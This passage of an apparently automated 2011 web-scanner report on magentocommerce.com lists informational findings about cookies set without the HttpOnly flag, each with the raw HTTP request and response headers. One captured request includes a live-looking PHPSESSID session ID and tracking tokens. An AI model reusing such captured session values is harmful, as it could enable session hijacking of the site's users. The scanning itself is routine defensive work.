The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.60. http://www.magentocommerce.com/media/interviews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.61. http://www.magentocommerce.com/media/interviews/alpedia/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.62. http://www.magentocommerce.com/media/interviews/bright-light-media/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.63. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.64. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.65. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.66. http://www.magentocommerce.com/media/interviews/lodger-footwear/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.67. http://www.magentocommerce.com/media/interviews/man-junk/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.68. http://www.magentocommerce.com/media/interviews/nerdyshirts/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.69. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.70. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.71. http://www.magentocommerce.com/media/interviews/shoebacca/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.72. http://www.magentocommerce.com/media/interviews/signing-time/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.73. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.74. http://www.magentocommerce.com/media/interviews/timeout-online/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/timeout-online/view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
